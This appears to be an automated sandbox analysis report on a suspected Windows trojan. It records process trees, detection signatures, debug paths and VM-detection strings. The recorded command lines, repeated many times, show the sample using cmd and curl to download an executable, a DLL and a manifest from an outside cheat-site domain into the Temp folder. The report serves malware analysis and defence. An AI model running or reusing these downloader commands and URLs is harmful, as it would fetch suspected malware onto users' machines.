Loading ...

Play interactive tourEdit tour

Windows Analysis Report j82lgS5kgk

Overview

General Information

Sample Name:j82lgS5kgk (renamed file extension from none to exe)
Analysis ID:553495
MD5:ae6cdc2be9207880528e784fc54501ed
SHA1:b4aff64bb1f0fee5d5c47c5f1275351c758b423a
SHA256:e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Checks if the current process is being debugged
Queries the installation date of Windows
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • j82lgS5kgk.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\j82lgS5kgk.exe" MD5: AE6CDC2BE9207880528E784FC54501ED)
    • cmd.exe (PID: 7132 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 4544 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 4700 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 6508 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 1380 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 6092 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • dw20.exe (PID: 5272 cmdline: dw20.exe -x -s 824 MD5: 9B2D2AE232F2D0EFAEF9D5EB2509BE79)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\j82lgS5kgk.exe" , ParentImage: C:\Users\user\Desktop\j82lgS5kgk.exe, ParentProcessId: 7104, ProcessCommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, ProcessId: 7132

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: j82lgS5kgk.exeVirustotal: Detection: 13%Perma Link
Source: j82lgS5kgk.exeReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\j82lgS5kgk.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
Source: j82lgS5kgk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe
Source: Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe
Source: Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: dw20.exe, 00000010.00000003.681799621.00000000005F6000.00000004.00000001.sdmp, dw20.exe, 00000010.00000002.684227164.00000000005F6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.16.drString found in binary or memory: http://upx.sf.net
Source: curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll
Source: cmd.exe, 00000007.00000002.661556157.000001DCDAA60000.00000004.00000040.sdmp, curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll-oC:
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll3
Source: j82lgS5kgk.exeString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllWhttps://sincheats.com/gas/PS4SAVEWIZARD.exe
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllurlrc
Source: curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe
Source: cmd.exe, 0000000C.00000002.671799816.000001A5F02C0000.00000004.00000040.sdmp, curl.exe, 0000000F.00000002.670533583.00000173F3420000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe-oC:
Source: curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp, curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, j82lgS5kgk.exeString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest
Source: cmd.exe, 00000001.00000002.656320836.00000254AB400000.00000004.00000040.sdmp, curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest-oC:
Source: curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmpString found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exeKH
Source: unknownDNS traffic detected: queries for: sincheats.com
Source: j82lgS5kgk.exeBinary or memory string: OriginalFilename vs j82lgS5kgk.exe
Source: j82lgS5kgk.exe, 00000000.00000002.683951517.00000000001F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe
Source: j82lgS5kgk.exe, 00000000.00000002.684043836.00000000005EB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs j82lgS5kgk.exe
Source: j82lgS5kgk.exeBinary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: j82lgS5kgk.exeVirustotal: Detection: 13%
Source: j82lgS5kgk.exeReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\j82lgS5kgk.exeFile read: C:\Users\user\Desktop\j82lgS5kgk.exeJump to behavior
Source: j82lgS5kgk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\j82lgS5kgk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\j82lgS5kgk.exe "C:\Users\user\Desktop\j82lgS5kgk.exe"
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifestJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dllJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exeJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"Jump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF404.tmpJump to behavior
Source: classification engineClassification label: mal48.winEXE@18/7@3/1
Source: C:\Users\user\Desktop\j82lgS5kgk.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: j82lgS5kgk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\j82lgS5kgk.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
Source: j82lgS5kgk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: j82lgS5kgk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe
Source: Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe
Source: Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: j82lgS5kgk.exeStatic PE information: 0xDDC5B4B8 [Wed Nov 26 21:46:32 2087 UTC]
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: Amcache.hve.16.drBinary or memory string: VMware
Source: Amcache.hve.16.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.16.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.16.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.16.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.
Source: dw20.exe, 00000010.00000002.684129056.0000000000581000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp
Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.drBinary or memory string: VMware7,1
Source: Amcache.hve.16.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.16.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dw20.exe, 00000010.00000002.684213809.00000000005E7000.00000004.00000020.sdmp, dw20.exe, 00000010.00000003.681586303.00000000005E7000.00000004.00000001.sdmp, dw20.exe, 00000010.00000003.681998985.00000000005E7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.16.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.16.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.me
Source: Amcache.hve.16.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp, curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.16.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifestJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dllJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exeJump to behavior
Source: C:\Users\user\Desktop\j82lgS5kgk.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"Jump to behavior
